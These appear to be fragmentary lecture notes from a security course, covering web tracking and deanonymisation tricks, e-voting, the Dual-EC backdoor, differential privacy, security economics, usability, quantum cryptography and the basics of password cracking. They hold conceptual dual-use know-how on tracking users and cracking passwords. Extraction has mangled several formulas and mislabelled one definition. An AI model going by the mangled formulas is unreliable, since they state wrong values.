1. buyers/users can’t tell apart good and bad products
2. sellers/service providers lose incentive to provide quality (in the case of the in-
ternet, privacy)
3. the bad crowds out the good since bad products are more profitable
• intellectual privacy
• behavioral targeting
• price discrimination
• NSA eavesdropping!
Aliasing
If you visit hi5.com with subdomain ad.hi5.com but DNS redirects to ad.yieldmanager.com.
Your browser is tricked since this works even if you block 3rd party cookies.
60 13 Web Privacy
Tagging
Definition. A server can set a flag in a user’s browser that says that a certain site
can only be accessed securely, through https
Fingerprinting
Pseudononymous can tell when same person comes back but don’t know real-life
identity. (Internet post-cookies)
1. Third party is sometimes a first party: have first party relationship with social
networking sites but they’re also as widgets on other pages
Example: Facebook’s Like button – even if you don’t click it, Facebook knows
you were on that page
2. Leakage of identifiers:
GET http://ad.doubleclick.net/adj/...
Referer: http://submit.SPORTS.com/[email protected]
Cookie: id=35c192bcfe0000b1...
In firefox, can put the url in a script tag, JavaScript throws error which includes
the url, giving randomwalker or other identity just from visiting this random page
Can embed invisible Google spreadsheet and look at “Viewing now” on another
machine– how to tell which of these users to serve what to? Use lots of different
spreadsheets. Assign users to a subset of 10 spreadsheets, and then chance of
overlap pretty low.
Defenses
1. Referer blocking
Two drawbacks: (1) many sites check these for CSFR defense. Blocking all referer
headers will break websites.
13 Web Privacy 63
14 Electronic voting
Requirements
• only authorized voters can vote
• ≤ 1 ballot per voter
• ballots counted as cast
• secret ballot; ”receipt-free” (cannot prove to 3rd party how you voted)
Logically, this involves two steps: (1) cast ballot into ballot box and (2) tally ballot
box to get result.
Old fashioned paper ballots are cheap to operate, easy to understand, but prob-
lematic if ballot is long/complex. Trickery is possible to: For example, chain voting
is when “goons” fill out a ballot and coerce people to deposit that ballot into the box
and return the blank one to them; repeats. There needs to also be a chain of custody
on the ballot box.
Example. Benaloh
Reencryption in El Gamal
• We see that r + r0 can decrypt the message! Also, these two CTs are indistin-
guishable!
How do we know shuffler didn’t cheat?
They start with a ”ballot box” B (sequence of encrypted ballots) and end with B 0 ,
which should be equivalent (reordering of reenc of B)
Proof protocol
• prover produces B1
• B1 should be equivalent to B and B 0
• prover (shuffler) knows the correspondence between B and B1 , and also between
B1 and B 0
Note: if B is not equivalent to B 0 , then B1 can’t be equive to both
66 14 Electronic voting
Fix? Introduce a trusted voting machine that the voter cannot manipulate; it encrypts
ballot and refuses to reveal r. But yet another problem: how do you know voting
machine protects integrity and confidentiality of ballot?
In summary
PAPER ELECTRONIC
counting: slow, expensive counting: fast, cheap
voter sees record directly voter does not see record directly
main threat: tampering afterwards main threat: tampering beforehand
PAPER + ELECTRONIC RECORDS: method of choice
Example: optical scan voting. Voter fills out paper ballot, feeds ballot not scanner,
scanner records electronic record, paper ballot feeds into ballot box
HYBRID COUNT
• count electronic records
14 Electronic voting 67
• statistical audit for consistency of the paper records with the electronic records
• for sample of ballots, compare by hand
68 15 Backdoors in crypto standards
BACK DOOR
• presence is not obvious
• keyed backdoors vs. unkeyed backdoors
KEYED BACKDOORS: need a secret master key to access back door
UNKEYED BACKDOORS: not obvious, but just hoping that someone doesn’t
notice; like a hidden door in real like
DUAL-EC
You “add” two EC points to get another EC point. Multiplying point by an int is the
same as adding it to itself repeatedly.
How it works
• Pick random, non-secret EC points P, Q
• start with secret integer s0
• to update and generate new output
si = x(si−1 P ) where x(.) extracts x coord
output T (x(si Q)) where T(.) truncates, discarding 16 high order
bits
Problem 1
Adversary can create keyed backdoor if they can choose P and Q (see slides)
So then naturally the NSA chose P and Q.
How to generate P and Q?
• choose random seed
• use a one-way algorithm
• get P and Q
But what if adversary chooses the seed?
It should be okay as long as one-way algorithm is good, and the adversary can’t
understand the relationship between P and Q
Problem 2 Output bits are easily distinguished from random. NSA argued against
fixing this (a vulnerability)
(It’s overwhelmingly likely that NSA created a keyed backdoor into this standard by
choosing P and Q)
What happened SSL/TLS are exploitable in practice. NIST’s errors? Not insisting
on fixing vulnerabilities, resulting in a loss of trust in NIST.
The end-user was more vulnerable to NSA due to keyed backdoor and more vulnerable
to others due to the bias (unkeyed backdoor)
Net effect: semi-keyed backdoor
70 15 Backdoors in crypto standards
There are a lot of known insecure curves, and some curves that are probably secure,
but no one can prove it. Let’s also say that some adversary can break a fraction f of
the believed-good curves.
Backdoor-proof standardization
• Transparency
discussions on the record, rationale for decisions published
• Discretion is a problem! It gives adversary latitude.
eg. choice of technical approach, choice of mathematical structure, choice of
constants
• Use competitions, because negotiations in a standards committee is risky.
participants submit completely proposals. One is chosen by a group and the
chosen proposal is adopted as-is or with absolutely clear improvements (this is
how AES was gotten)
Shared trust standards benefit everyone :)
20 Big data and privacy 71
Definition. Given two databases D and D0 , where D0 is D with your data removed,
anything an analyst can learn from D, they can also learn from D0
Theorem 20.1. Semantic privacy implies that the result of the analysis does not de-
pend on the contents of the dataset.
Pr[Q(D1 ) ∈ S] ≤ e · Pr[Q(D2 ) ∈ S]
Example. Counting queries: ‘‘How many items in the DB have the property _____?’’
To make results “non weird” (1) round off numbers to integers, (2) if a result is less
than 0, set it to 0, and (3) if a result is greater than a cap N , set it to N .
What about multiple queries and averaging?
Theorem 20.2. If Q is E1-DP, and Q’ is E2-DP, then (Q(.), Q’(.)) is (E1 + E2)-DP.
(Essentially, you’ve added how non-private the queries are)
The implications? You can give an analyst an “ budget” and let them decide how to
use it.
Generalizing beyond counting queries
If each element of the database can add/subtract at most some number V from the
results of the query, then we can generate noise from this distribution:
Problems
Example. Artificial example: But what if there exists a book that only Ed would
buy?
“People who bought said book also bought Y”
Now you can easily extract information about what else Ed buys.
20 Big data and privacy 73
Example. Less artificial example: But what if there exists a rare book that you know
Ed bought?
“People who bought said book also bought Y”
Collaborative recommendations are still a clue about what Ed bought.
How to fix
21 Economics of Security
Does the market produce optimal security? To understand this question, we’ll first
want to to define what ”optimal” means.
Definitions of Efficiency
Market Failures
• In general, users will invest in reducing harm to themselves, but not to strangers
• Outcome is underinvestment in security, since the external harm doesn’t enter
into user’s cost/benefit calculation
• Breakdown in perfect bargaining, since the ”strangers” are unidentified and un-
able to invest to prevent the harm that falls on them
Market failure #2: Asymmetric Information
• Arises when vendors know more than users about the security of their products
• If it is hard for buyers to evaluate the security of products, then they won’t be
able to differentiate between high-quality and low-quality products
• As a result, users won’t pay more for supposedly high-quality products, so pro-
ducers won’t invest to develop more secure products, leading to underinvestment
in security
• Antidotes:
– Warranties: act as a signal of quality to buyers if companies willing to bear
the downside of security breaches
– Seller reputation: companies may be harmed in the long-run by selling poor
quality products due to damaged reputation
– Note: both of these solutions don’t work well for start-ups, since the lifetime
of these companies are short and thus warranties aren’t very valuable and
seller reputation isn’t a large concern
Network Effect:
• Some products tend to become more valuable the more people use it (e.g. search
engines)
• Markets for these products tend to be pushed towards monopoly
• Standardization can lead to positive network effect without monopoly
• Argument: network effect → monoculture
• Example: if all products use the same security protocol, might be easier for bad
guys to break lots of system by exploiting a vulnerability in that standard
• However, there are benefits to having a dominant producer of security:
– There are scale efficiencies in security, since large companies can amortize
investments over a large number of users
– Companies can also internalize some of the security benefits, if users harmed
(as in the Negative Externality scenario) fall within the same user base
76 21 Economics of Security
Large customers tend to be able to protect themselves; for example, they can demand
that certain security features be implemented in a product. But what about individual
users?
Can market structures improve information flow? Insurance companies (i.e. that
offer insurance against security breaches) can aggregate the bargaining power of many
different customers. Certification programs, which would give products/companies cer-
tificates of quality, could lead to the same effect. Presumably, certified companies
would see more demand and be able to charge higher prices for their products. How-
ever, companies are unlikely to pay certification bodies to criticize their software.
Can we change liability rules? An optimal liability rule: costs should be borne by
whoever can best prevent harm.
A common mistake when designing security software is to ”design for yourself.” There
are many different kinds of users, and their needs will probably vary over time, so
designing software for the use of a knowledgable developer is probably a misguided
approach.
Some researchers presented ”average users” with a PGP mail client, and asked them
to perform tasks that required encryption (e.g. send a secure email to Alice, set up a
new secure communication with Charlie). The goals were to observe a) how they use
it and b) what mistakes they make.
The study revealed that average users experienced LOTS of usability problems and
made LOTS of security errors. Why?
• UI design mistakes (e.g. hard to find something in a dropdown menu)
• Metaphor mismatch
– e.g. RSA key was visualized with a physical key icon
– but a cryptographic key isn’t much like a physical key
– why would a user want to publish their key? (as they do with the public
key) why are there two keys (public and private)?
– one suggestion: ”ciphertext is a locked chest” (not a perfect analogy)
• User has to do lots of work up front, before communicating at all
– have to first generate a key pair
– this is the point in the process where users understand the least, and are
most eager to send a message
This case study raises the question about what role the user should play in a secure
procedure. Should they
• control a mechanism? (e.g. ”block cookies” on a browser)
• use a tool? (e.g. ”clear history” on a browser, which performs many tasks like
clearing cache)
• state a goal?
80 22 Human Factors in Security
The goal for many systems is a ”naturally secure interface.” One example here is the
camera light on a laptop that is intended to light up whenever camera is in use.
• user obtains protection against being secretly recorded
• however, on Macs, this light can be bypassed by re-programming firmware that
links camera and light
• a better solution would be to build in a hardware interlock between camera and
light
Case study: an organization that recruits volunteers to break the law in order to put
political pressure on issues. Organizations like this have a strong incentive to encrypt,
since their threat model includes an adversary (government) with a large amount of
resources.
Warning messages
Warning messages are often used to preempt security breaches. However, users can
suffer from ”dialogue fatigue” and either click through important warnings or find
workarounds.
Countermeasures:
• Vary design of dialogue
• Make ”No” the default (so user can’t click enter to move through0
22 Human Factors in Security 81
NEAT/SPRUCE Framework
23 Quantum Computing
Classical Bits
Multi-qubit systems:
• In a classical system with k bits, the possible states of the system are |(every k-bit string) >,
of which there are 2k
k −1
2P
• In a quantum system, the possible states are αi · |si >, where si is the ith
i=0
k −1
2P
k-bit string, such that |αi |2 = 1
i=0
• Measuring the system forces it into classical state |si > with probability |αi |2
• In principle, operations on the multi-qubit system include any unitary matrix
• In practice, we use a few simple gates
• Computation:
– initial state = |(input)00000 > (input is padded with zeros to some fixed
length)
– perform some preprogrammed set of gates
– measure system to produce output
– goal is for the system to collapse to the ”correct” answer with high proba-
bility upon measurement
Can we built a quantum computer? Right now, we can only build small ones, but there
is reason to believe we will be able to construct larger ones in the future.
Advantages of QC
There is a common but wrong view that quantum computers will be able to solve any
problem in NP efficiently (i.e. in polynomial time). The idea here is that you can put
a quantum computer into a state which is a superposition of all the possible solutions,
84 23 Quantum Computing
and then measure to determine the ”correct” answer. In reality, decreasing the coef-
ficients on incorrect answers and increasing the coefficient on correct answer(s) isn’t
always easy.
What we know:
• for general NP hard problems, classical computers require brute force search
(takes O(2n ) time)
• Grover’s algorithm =⇒ quantum computers can solve these problems in O(2n/2 ),
a dramatic improvement but still super-polynomial
• there exist some such problems which quantum computers can solve efficiently
– factoring (via Shor’s algorithm)
– discrete log problem (via a variant of Shor’s algorithm)
• in a world with large quantum computers, protocols that rely on the hardness of
factoring and the discrete log problem are useless (including RSA, Diffie-Hellman,
etc)
• most symmetric crypto (e.g. AES) is not breakable (in the domain of Grovers
algorithm)
• Grover’s algorithm implies that we can break AES that uses a 128-bit key in
2128/2 = 26 4 steps
• Solution: double the key size
• are there public key algorithms that are not breakable fast by quantum comput-
ers? probably
• Threat model:
– quantum channel between Alice and Bob
– assume there exists an eavesdropper who a) can measure but b) cannot
modify qubits in the channel without measuring
• 1) before sending, Alice flips coin; if heads, apply R to the bit before sending
• 2) when Bob gets a bit, flip coin: if heads, apply R−1 to the bit before measuring
23 Quantum Computing 85
• 3) Alice and Bob publish their coin flips, discard any bits where flips dont match
• 4) Alice picks half of the remaining bits, at random, and Alice and Bob publish
their values for these bits
– if any fail to match, abort the protocol (eavesdropper was measuring)
– otherwise, use the remaining bits as a shared secret
• The adversary has a decision: which bits, if any, should he measure?
• If adversary measures:
– if Alice flipped tails, gets correct value
– if Alice flipped heads, get correct value with probability 50%
– If Alice flipped heads and Bob applied R−1 , then there is a 50% chance
Bob’s bit won’t match Alice’s
– Overall, if the adversary measures, there is a 25% chance that Bob’s bit
won’t match alice’s (chance that Alice flipped heads times chance bit col-
lapsed to the wrong value during adversary’s measurement)
• The adversary might also try to apply R−1 before measuring; in this case, he
runs the risk of disrupting bits that were in the classical state to begin with
• Problem: the adversary needs to guess Alices coin flip to measure the bit without
disturbing it
– if the adversary modifies more than 4 of the check bits, they will get caught
with greater than 50% probability
– if the adversary measures a lot, likely that integrity check will fail
– if the adversary doesnt measure a lot, Alice and Bob will have a larger
shared secret
86 24 Password Cracking
24 Password Cracking
Elementary Methods
First, try to define and reduce the search space for a brute-force search:
• all short strings
• combinations of dictionary words
• dictionary words + common modifications (special characters, exclamation point
at the end)
• leaked passwords from past breaches
• dictionary words and one-character modifications
Properties of brute-force search:
• Time requirement: ∼ |D|, where |D| is the length of the dictionary
• Space: ∼ 1
• Can speed up the process by pre-computing hashes of all possible passwords in
search space:
– Fill hash table: can then find x ∈ D given H(x)
– Time to build: ∼ |D|
– Space: ∼ |D|
– Time to recover: ∼ 1
• What we want: smaller data structure, but still fast lookup =⇒ Rainbow Tables
Rainbow Tables